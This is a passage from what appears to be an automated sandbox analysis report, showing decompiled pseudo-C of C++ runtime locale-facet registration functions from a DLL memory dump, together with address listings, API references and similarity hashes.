																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t233, _t312, _t321, 8);
																			E6E18F2A5(_t334 - 0x14, 0);
																			_t322 =  *0x6e221704; // 0x0
																			 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
																			 *(_t334 - 0x10) = _t322;
																			_t313 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e2216b8, _t312, _t322));
																			__eflags = _t313;
																			if(_t313 != 0) {
																				L40:
																				E6E18F30C(_t334 - 0x14);
																				return E6E1A9D88(_t313);
																			} else {
																				__eflags = _t322;
																				if(_t322 == 0) {
																					_push( *((intOrPtr*)(_t334 + 8)));
																					_push(_t334 - 0x10);
																					__eflags = E6E19B1A4(_t233, _t313, _t322) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t233, _t313, _t322, 8);
																						E6E18F2A5(_t334 - 0x14, 0);
																						_t323 =  *0x6e221738; // 0x0
																						 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
																						 *(_t334 - 0x10) = _t323;
																						_t314 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e2216e4, _t313, _t323));
																						__eflags = _t314;
																						if(_t314 != 0) {
																							L47:
																							E6E18F30C(_t334 - 0x14);
																							return E6E1A9D88(_t314);
																						} else {
																							__eflags = _t323;
																							if(_t323 == 0) {
																								_push( *((intOrPtr*)(_t334 + 8)));
																								_push(_t334 - 0x10);
																								__eflags = E6E19B210(_t233, _t314, _t323) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t233, _t314, _t323, 8);
																									E6E18F2A5(_t334 - 0x14, 0);
																									_t324 =  *0x6e221708; // 0x0
																									 *(_t334 - 4) =  *(_t334 - 4) & 0x00000000;
																									 *(_t334 - 0x10) = _t324;
																									_t315 = E6E162171( *((intOrPtr*)(_t334 + 8)), E6E161F29(_t233, 0x6e221698, _t314, _t324));
																									__eflags = _t315;
																									if(_t315 != 0) {
																										L54:
																										E6E18F30C(_t334 - 0x14);
																										return E6E1A9D88(_t315);
																									} else {
																										__eflags = _t324;
																										if(_t324 == 0) {
																											_push( *((intOrPtr*)(_t334 + 8)));
																											_push(_t334 - 0x10);
																											_t192 = E6E19B284(_t233, _t315, _t324);
																											_pop(_t281);
																											__eflags = _t192 - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ecb1a, _t233, _t315, _t324, 4);
																												_t325 = _t281;
																												 *(_t334 - 0x10) = _t325;
																												 *((intOrPtr*)(_t325 + 4)) =  *((intOrPtr*)(_t334 + 0xc));
																												_push( *((intOrPtr*)(_t334 + 0x14)));
																												_t103 = _t334 - 4;
																												 *_t103 =  *(_t334 - 4) & 0x00000000;
																												__eflags =  *_t103;
																												 *_t325 = 0x6e1f225c;
																												 *((char*)(_t325 + 0x28)) =  *((intOrPtr*)(_t334 + 0x10));
																												E6E19F3D8(_t233, _t281, _t306, _t315, _t325,  *_t103);
																												return E6E1A9D88(_t325,  *((intOrPtr*)(_t334 + 8)));
																											} else {
																												_t315 =  *(_t334 - 0x10);
																												 *(_t334 - 0x10) = _t315;
																												 *(_t334 - 4) = 1;
																												E6E1911C1(__eflags, _t315);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t315 + 4))))();
																												 *0x6e221708 = _t315;
																												goto L54;
																											}
																										} else {
																											_t315 = _t324;
																											goto L54;
																										}
																									}
																								} else {
																									_t314 =  *(_t334 - 0x10);
																									 *(_t334 - 0x10) = _t314;
																									 *(_t334 - 4) = 1;
																									E6E1911C1(__eflags, _t314);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t314 + 4))))();
																									 *0x6e221738 = _t314;
																									goto L47;
																								}
																							} else {
																								_t314 = _t323;
																								goto L47;
																							}
																						}
																					} else {
																						_t313 =  *(_t334 - 0x10);
																						 *(_t334 - 0x10) = _t313;
																						 *(_t334 - 4) = 1;
																						E6E1911C1(__eflags, _t313);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																						 *0x6e221704 = _t313;
																						goto L40;
																					}
																				} else {
																					_t313 = _t322;
																					goto L40;
																				}
																			}
																		} else {
																			_t312 =  *(_t334 - 0x10);
																			 *(_t334 - 0x10) = _t312;
																			 *(_t334 - 4) = 1;
																			E6E1911C1(__eflags, _t312);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																			 *0x6e221734 = _t312;
																			goto L33;
																		}
																	} else {
																		_t312 = _t321;
																		goto L33;
																	}
																}
															} else {
																_t311 =  *(_t334 - 0x10);
																 *(_t334 - 0x10) = _t311;
																 *(_t334 - 4) = 1;
																E6E1911C1(__eflags, _t311);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																 *0x6e221718 = _t311;
																goto L26;
															}
														} else {
															_t311 = _t320;
															goto L26;
														}
													}
												} else {
													_t310 =  *(_t334 - 0x10);
													 *(_t334 - 0x10) = _t310;
													 *(_t334 - 4) = 1;
													E6E1911C1(__eflags, _t310);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
													 *0x6e221714 = _t310;
													goto L19;
												}
											} else {
												_t310 = _t319;
												goto L19;
											}
										}
									} else {
										_t309 =  *(_t334 - 0x10);
										 *(_t334 - 0x10) = _t309;
										 *(_t334 - 4) = 1;
										E6E1911C1(__eflags, _t309);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
										 *0x6e2216e8 = _t309;
										goto L12;
									}
								} else {
									_t309 = _t318;
									goto L12;
								}
							}
						} else {
							_t308 =  *(_t334 - 0x10);
							 *(_t334 - 0x10) = _t308;
							 *(_t334 - 4) = 1;
							E6E1911C1(__eflags, _t308);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
							 *0x6e221710 = _t308;
							goto L5;
						}
					} else {
						_t308 = _t317;
						goto L5;
					}
				}
			}

0x6e19949e
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994cf
0x6e1994d4
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc

APIs

__EH_prolog3.LIBCMT ref: 6E1994A5
std::_Lockit::_Lockit.LIBCPMT ref: 6E1994AF

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199500
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199520
Concurrency::cancel_current_task.LIBCPMT ref: 6E19952D

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: e60d9963873791142cd5ec9f814eca9c77b510eb5bc2c0a00ec414544fcb38fa
Instruction ID: 304965b77cae73b617bea79dc6c20b48b8e1b8d94871399632200c9b0c65a8d4
Opcode Fuzzy Hash: e60d9963873791142cd5ec9f814eca9c77b510eb5bc2c0a00ec414544fcb38fa
Instruction Fuzzy Hash: 9E0184B59005199FCF05DBE4D864AFE7779BF84314F244909E821AB290CF709AC9FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1934F1, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E1934F1(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				signed int _v16;
				char _v20;
				signed int _t46;
				void* _t73;
				char* _t107;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				char* _t125;

				_t89 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5( &_v20, 0);
				_t122 =  *0x6e2215ec; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t122;
				_t46 = E6E162171(_a8, E6E161F29(__ebx, 0x6e2215e0, __edi, _t122));
				_t118 = _t46;
				if(_t46 != 0) {
					L5:
					E6E18F30C( &_v20);
					return E6E1A9D88(_t118);
				} else {
					if(_t122 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E193C2A(__ebx, _t118, _t122) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t89, _t118, _t122, 8);
							E6E18F2A5( &_v20, 0);
							_t123 =  *0x6e2215f0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t123;
							_t119 = E6E162171(_a8, E6E161F29(_t89, 0x6e2215e4, _t118, _t123));
							__eflags = _t119;
							if(_t119 != 0) {
								L12:
								E6E18F30C( &_v20);
								return E6E1A9D88(_t119);
							} else {
								__eflags = _t123;
								if(_t123 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E193C92(_t89, _t119, _t123) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t89, _t119, _t123, 8);
										E6E18F2A5( &_v20, 0);
										_t124 =  *0x6e2215f4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t124;
										_t120 = E6E162171(_a8, E6E161F29(_t89, 0x6e2215e8, _t119, _t124));
										__eflags = _t120;
										if(_t120 != 0) {
											L19:
											E6E18F30C( &_v20);
											return E6E1A9D88(_t120);
										} else {
											__eflags = _t124;
											if(_t124 == 0) {
												_push(_a8);
												_push( &_v16);
												_t73 = E6E193CFA(_t89, _t120, _t124);
												_pop(_t107);
												__eflags = _t73 - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													_push(_t124);
													_t125 = _t107;
													_t39 = _t125 + 0x10;
													 *_t39 =  *(_t125 + 0x10) & 0x00000000;
													__eflags =  *_t39;
													 *((intOrPtr*)(_t125 + 0x14)) = 0xf;
													 *_t125 = 0;
													E6E1958BE(_t107, _a4, _a8);
													return _t125;
												} else {
													_t120 = _v16;
													_v16 = _t120;
													_v4 = 1;
													E6E1911C1(__eflags, _t120);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 4))))();
													 *0x6e2215f4 = _t120;
													goto L19;
												}
											} else {
												_t120 = _t124;
												goto L19;
											}
										}
									} else {
										_t119 = _v16;
										_v16 = _t119;
										_v4 = 1;
										E6E1911C1(__eflags, _t119);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t119 + 4))))();
										 *0x6e2215f0 = _t119;
										goto L12;
									}
								} else {
									_t119 = _t123;
									goto L12;
								}
							}
						} else {
							_t118 = _v16;
							_v16 = _t118;
							_v4 = 1;
							E6E1911C1(__eflags, _t118);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 4))))();
							 *0x6e2215ec = _t118;
							goto L5;
						}
					} else {
						_t118 = _t122;
						goto L5;
					}
				}
			}

0x6e1934f1
0x6e1934f8
0x6e193502
0x6e193507
0x6e193512
0x6e193516
0x6e193522
0x6e193527
0x6e19352b
0x6e193570
0x6e193573
0x6e19357f
0x6e19352d
0x6e19352f
0x6e193535
0x6e19353b
0x6e193543
0x6e193546
0x6e193580
0x6e193585
0x6e19358d
0x6e193597
0x6e19359c
0x6e1935a7
0x6e1935ab
0x6e1935bc
0x6e1935be
0x6e1935c0
0x6e193605
0x6e193608
0x6e193614
0x6e1935c2
0x6e1935c2
0x6e1935c4
0x6e1935ca
0x6e1935d0
0x6e1935d8
0x6e1935db
0x6e193615
0x6e19361a
0x6e193622
0x6e19362c
0x6e193631
0x6e19363c
0x6e193640
0x6e193651
0x6e193653
0x6e193655
0x6e19369a
0x6e19369d
0x6e1936a9
0x6e193657
0x6e193657
0x6e193659
0x6e19365f
0x6e193665
0x6e193666
0x6e19366c
0x6e19366d
0x6e193670
0x6e1936aa
0x6e1936af
0x6e1936b3
0x6e1936b7
0x6e1936bc
0x6e1936bc
0x6e1936bc
0x6e1936c0
0x6e1936c7
0x6e1936ca
0x6e1936d3
0x6e193672
0x6e193672
0x6e193675
0x6e193679
0x6e19367d
0x6e19368a
0x6e193692
0x6e193694
0x00000000
0x6e193694
0x6e19365b
0x6e19365b
0x00000000
0x6e19365b
0x6e193659
0x6e1935dd
0x6e1935dd
0x6e1935e0
0x6e1935e4
0x6e1935e8
0x6e1935f5
0x6e1935fd
0x6e1935ff
0x00000000
0x6e1935ff
0x6e1935c6
0x6e1935c6
0x00000000
0x6e1935c6
0x6e1935c4
0x6e193548
0x6e193548
0x6e19354b
0x6e19354f
0x6e193553
0x6e193560
0x6e193568
0x6e19356a
0x00000000
0x6e19356a
0x6e193531
0x6e193531
0x00000000
0x6e193531
0x6e19352f

APIs

__EH_prolog3.LIBCMT ref: 6E1934F8
std::_Lockit::_Lockit.LIBCPMT ref: 6E193502

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E193553
std::_Lockit::~_Lockit.LIBCPMT ref: 6E193573
Concurrency::cancel_current_task.LIBCPMT ref: 6E193580

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 8e9793d7d8f9d540b42261c369a5d6d693fd46efb884ed5ed65e81fe2696e059
Instruction ID: 26f09a5d5d68d31964b39b6bd944dfd069fc936176d831c07e34d94b45f09b13
Opcode Fuzzy Hash: 8e9793d7d8f9d540b42261c369a5d6d693fd46efb884ed5ed65e81fe2696e059
Instruction Fuzzy Hash: 43018479A00519DFCB06DBE4D8546EE77B9AF84314F244849E815AB280DF30DAC5BB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E199533, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E6E199533(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t98;
				void* _t169;
				signed int _t248;
				void* _t270;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				void* _t295;

				_t206 = __ebx;
				E6E1A9DBF(0x6e1ec3ec, __ebx, __edi, __esi, 8);
				E6E18F2A5(_t295 - 0x14, 0);
				_t280 =  *0x6e2216e8; // 0x0
				 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
				 *(_t295 - 0x10) = _t280;
				_t98 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(__ebx, 0x6e22169c, __edi, _t280));
				_t272 = _t98;
				if(_t98 != 0) {
					L5:
					E6E18F30C(_t295 - 0x14);
					return E6E1A9D88(_t272);
				} else {
					if(_t280 == 0) {
						_push( *((intOrPtr*)(_t295 + 8)));
						_push(_t295 - 0x10);
						__eflags = E6E19AFED(__ebx, _t272, _t280) - 0xffffffff;
						if(__eflags == 0) {
							E6E161CB5(__eflags);
							asm("int3");
							E6E1A9DBF(0x6e1ec3ec, _t206, _t272, _t280, 8);
							E6E18F2A5(_t295 - 0x14, 0);
							_t281 =  *0x6e221714; // 0x0
							 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
							 *(_t295 - 0x10) = _t281;
							_t273 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e2216c0, _t272, _t281));
							__eflags = _t273;
							if(_t273 != 0) {
								L12:
								E6E18F30C(_t295 - 0x14);
								return E6E1A9D88(_t273);
							} else {
								__eflags = _t281;
								if(_t281 == 0) {
									_push( *((intOrPtr*)(_t295 + 8)));
									_push(_t295 - 0x10);
									__eflags = E6E19B055(_t206, _t273, _t281) - 0xffffffff;
									if(__eflags == 0) {
										E6E161CB5(__eflags);
										asm("int3");
										E6E1A9DBF(0x6e1ec3ec, _t206, _t273, _t281, 8);
										E6E18F2A5(_t295 - 0x14, 0);
										_t282 =  *0x6e221718; // 0x0
										 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
										 *(_t295 - 0x10) = _t282;
										_t274 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e2216c4, _t273, _t282));
										__eflags = _t274;
										if(_t274 != 0) {
											L19:
											E6E18F30C(_t295 - 0x14);
											return E6E1A9D88(_t274);
										} else {
											__eflags = _t282;
											if(_t282 == 0) {
												_push( *((intOrPtr*)(_t295 + 8)));
												_push(_t295 - 0x10);
												__eflags = E6E19B0BD(_t206, _t274, _t282) - 0xffffffff;
												if(__eflags == 0) {
													E6E161CB5(__eflags);
													asm("int3");
													E6E1A9DBF(0x6e1ec3ec, _t206, _t274, _t282, 8);
													E6E18F2A5(_t295 - 0x14, 0);
													_t283 =  *0x6e221734; // 0x0
													 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
													 *(_t295 - 0x10) = _t283;
													_t275 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e2216e0, _t274, _t283));
													__eflags = _t275;
													if(_t275 != 0) {
														L26:
														E6E18F30C(_t295 - 0x14);
														return E6E1A9D88(_t275);
													} else {
														__eflags = _t283;
														if(_t283 == 0) {
															_push( *((intOrPtr*)(_t295 + 8)));
															_push(_t295 - 0x10);
															__eflags = E6E19B138(_t206, _t275, _t283) - 0xffffffff;
															if(__eflags == 0) {
																E6E161CB5(__eflags);
																asm("int3");
																E6E1A9DBF(0x6e1ec3ec, _t206, _t275, _t283, 8);
																E6E18F2A5(_t295 - 0x14, 0);
																_t284 =  *0x6e221704; // 0x0
																 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
																 *(_t295 - 0x10) = _t284;
																_t276 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e2216b8, _t275, _t284));
																__eflags = _t276;
																if(_t276 != 0) {
																	L33:
																	E6E18F30C(_t295 - 0x14);
																	return E6E1A9D88(_t276);
																} else {
																	__eflags = _t284;
																	if(_t284 == 0) {
																		_push( *((intOrPtr*)(_t295 + 8)));
																		_push(_t295 - 0x10);
																		__eflags = E6E19B1A4(_t206, _t276, _t284) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t206, _t276, _t284, 8);
																			E6E18F2A5(_t295 - 0x14, 0);
																			_t285 =  *0x6e221738; // 0x0
																			 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
																			 *(_t295 - 0x10) = _t285;
																			_t277 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e2216e4, _t276, _t285));
																			__eflags = _t277;
																			if(_t277 != 0) {
																				L40:
																				E6E18F30C(_t295 - 0x14);
																				return E6E1A9D88(_t277);
																			} else {
																				__eflags = _t285;
																				if(_t285 == 0) {
																					_push( *((intOrPtr*)(_t295 + 8)));
																					_push(_t295 - 0x10);
																					__eflags = E6E19B210(_t206, _t277, _t285) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t206, _t277, _t285, 8);
																						E6E18F2A5(_t295 - 0x14, 0);
																						_t286 =  *0x6e221708; // 0x0
																						 *(_t295 - 4) =  *(_t295 - 4) & 0x00000000;
																						 *(_t295 - 0x10) = _t286;
																						_t278 = E6E162171( *((intOrPtr*)(_t295 + 8)), E6E161F29(_t206, 0x6e221698, _t277, _t286));
																						__eflags = _t278;
																						if(_t278 != 0) {
																							L47:
																							E6E18F30C(_t295 - 0x14);
																							return E6E1A9D88(_t278);
																						} else {
																							__eflags = _t286;
																							if(_t286 == 0) {
																								_push( *((intOrPtr*)(_t295 + 8)));
																								_push(_t295 - 0x10);
																								_t169 = E6E19B284(_t206, _t278, _t286);
																								_pop(_t248);
																								__eflags = _t169 - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ecb1a, _t206, _t278, _t286, 4);
																									_t287 = _t248;
																									 *(_t295 - 0x10) = _t287;
																									 *((intOrPtr*)(_t287 + 4)) =  *((intOrPtr*)(_t295 + 0xc));
																									_push( *((intOrPtr*)(_t295 + 0x14)));
																									_t91 = _t295 - 4;
																									 *_t91 =  *(_t295 - 4) & 0x00000000;
																									__eflags =  *_t91;
																									 *_t287 = 0x6e1f225c;
																									 *((char*)(_t287 + 0x28)) =  *((intOrPtr*)(_t295 + 0x10));
																									E6E19F3D8(_t206, _t248, _t270, _t278, _t287,  *_t91);
																									return E6E1A9D88(_t287,  *((intOrPtr*)(_t295 + 8)));
																								} else {
																									_t278 =  *(_t295 - 0x10);
																									 *(_t295 - 0x10) = _t278;
																									 *(_t295 - 4) = 1;
																									E6E1911C1(__eflags, _t278);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t278 + 4))))();
																									 *0x6e221708 = _t278;
																									goto L47;
																								}
																							} else {
																								_t278 = _t286;
																								goto L47;
																							}
																						}
																					} else {
																						_t277 =  *(_t295 - 0x10);
																						 *(_t295 - 0x10) = _t277;
																						 *(_t295 - 4) = 1;
																						E6E1911C1(__eflags, _t277);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t277 + 4))))();
																						 *0x6e221738 = _t277;
																						goto L40;
																					}
																				} else {
																					_t277 = _t285;
																					goto L40;
																				}
																			}
																		} else {
																			_t276 =  *(_t295 - 0x10);
																			 *(_t295 - 0x10) = _t276;
																			 *(_t295 - 4) = 1;
																			E6E1911C1(__eflags, _t276);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t276 + 4))))();
																			 *0x6e221704 = _t276;
																			goto L33;
																		}
																	} else {
																		_t276 = _t284;
																		goto L33;
																	}
																}
															} else {
																_t275 =  *(_t295 - 0x10);
																 *(_t295 - 0x10) = _t275;
																 *(_t295 - 4) = 1;
																E6E1911C1(__eflags, _t275);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t275 + 4))))();
																 *0x6e221734 = _t275;
																goto L26;
															}
														} else {
															_t275 = _t283;
															goto L26;
														}
													}
												} else {
													_t274 =  *(_t295 - 0x10);
													 *(_t295 - 0x10) = _t274;
													 *(_t295 - 4) = 1;
													E6E1911C1(__eflags, _t274);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t274 + 4))))();
													 *0x6e221718 = _t274;
													goto L19;
												}
											} else {
												_t274 = _t282;
												goto L19;
											}
										}
									} else {
										_t273 =  *(_t295 - 0x10);
										 *(_t295 - 0x10) = _t273;
										 *(_t295 - 4) = 1;
										E6E1911C1(__eflags, _t273);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t273 + 4))))();
										 *0x6e221714 = _t273;
										goto L12;
									}
								} else {
									_t273 = _t281;
									goto L12;
								}
							}
						} else {
							_t272 =  *(_t295 - 0x10);
							 *(_t295 - 0x10) = _t272;
							 *(_t295 - 4) = 1;
							E6E1911C1(__eflags, _t272);
							 *0x6e1ee1b4();
